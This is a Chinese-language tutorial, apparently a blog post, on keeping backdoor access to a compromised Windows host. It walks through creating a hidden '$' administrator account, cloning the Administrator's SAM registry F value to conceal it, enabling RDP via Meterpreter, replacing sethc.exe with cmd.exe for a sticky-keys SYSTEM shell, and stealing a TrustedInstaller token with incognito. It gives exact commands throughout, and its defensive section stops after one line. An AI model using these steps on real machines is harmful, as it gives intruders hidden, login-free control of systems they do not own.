Windows系统隐藏用户
该方法是通过建立隐藏账户,制作系统用户远程控制后门,维持目标Windows
系统权限。制作方法跟步骤如下:
已经获取系统权限执行添加用户操作
net user hahaha$ Aa123456 /add
net localgroup administrators hahaha$ /add
net user
如上图,我们已经创建成功,执行net user命令,发现是看不到hahaha$用户的:
但是这就结束了吗,没有!虽然上面net user看不见该隐藏用户,
但是在控制面板和计算机管理的本地用户和组中,仍然是可以看的到该用户的:
为了更好地隐藏我们的后门账户,我们还要开启目标主机的远程桌面进行如下操作。
meterpreter > run post/windows/manage/enable_rdp//开启3389服务
打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SAM\SAM,
单机右建,选择“权限”,把Administrator用户的权限,设置成
“完全控制”权限,然后关闭注册表编辑器,再次打开即可。
这样SAM下的文件就都能看见了如下图所示
然后,在注册表编辑器的HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names处,点击Administrator用户,在左侧找到和在右边显示的键值的类型一项“0x1f4”相同的目录名,也就是箭头所指目录“000001F4”:
复制000001F4目录中的F键的值:
然后找到与隐藏账户hahaha$右边类型的键值“0x3ec”相同的目录名,也就是。
然后将000001F4的F值粘贴到000003EC的F值中,点击确定:
然后从注册表中右键导出000003EC和hahaha$,
并删除hahaha$用户 net user hahaha$ /del:
此时发现在用户本地组中查不到hahaha$用户,已经被成功隐藏起来。
最后,将刚才导出的两个后缀为.reg的注册表项导入注册表中:
最后直接3389连接,输入隐藏的用户名密码即可
粘滞键后门
如果在电脑上连按五次shift键,发现电脑屏幕上弹出了一个叫做“粘滞键”的程序
思考一下,如果我们知道了这个程序的绝对路径,那么我们就可以将cmd.exe
伪装成这个粘滞键程序,
当我们连按五次shift键时,便会弹出一个CMD命令行窗口,那么我们
就可以无需登录进系统便可以控制目标主机了。
粘滞键程序名称为“sethc.exe”,其路径为“c:\windows\system32\sethc.exe”。
利用粘滞键做后门是一种比较常见的持续控制方法。
其基本流程如下:
1. 手动或利用工具,找到sethc.exe将其删除或改名为sethc.exe.bak,
2. 接着将cmd.exe程序复制一个副本,并命名为“sethc.exe”
3. 最后,重启计算机再次按下5次Shift键,会弹出CMD界面,后门制作成功
手动执行
在目标主机上执行如下命令即可:
cd c:\windows\system32
move sethc.exe sethc.exe.bak // 将sethc.exe重命名
copy cmd.exe sethc.exe // 将cmd.exe副本保存伪装成sethc.exe
实验注意事项:
该cmd是以system权限运行的,接下来我们就可以无需知道登录密码,
无需登录,直接对目标主机执行各种高权限的操作了,
也完全可以新建一个高权限用户直接登录进入系统,是不是很有意思?
但是,先别高兴地太早了,在一些做了防护的主机上,即使是SYSTEM权限
也是无法修改sethc.exe的:
解决方法:
只有TrustedInstaller权限才可以,这时,我们就要先模拟一个TrustedInstaller
权限的令牌获取TrustedInstaller权限,
然后再执行上述操作。我们的思路如下:
当我们启动TrustedInstaller服务时会启动进程TrustedInstaller.exe,
该程序的权限为NT SERVICE\TrustedInstaller,那么我们就可以窃取该
进程的令牌。
首先进入shell启动TrustedInstaller服务:
sc.exe start TrustedInstaller
然后利用令牌窃取TrustedInstaller权限
use incognito
ps # 找到TrustedInstaller的进程PID,这里为1056
steal_token <PID> # 从该进程中窃取令牌
getuid
实验成功截图:连续按五次shift键即可弹出cmd窗口
针对粘滞键后门的防范措施:
远程登录服务器时,连续按5此shift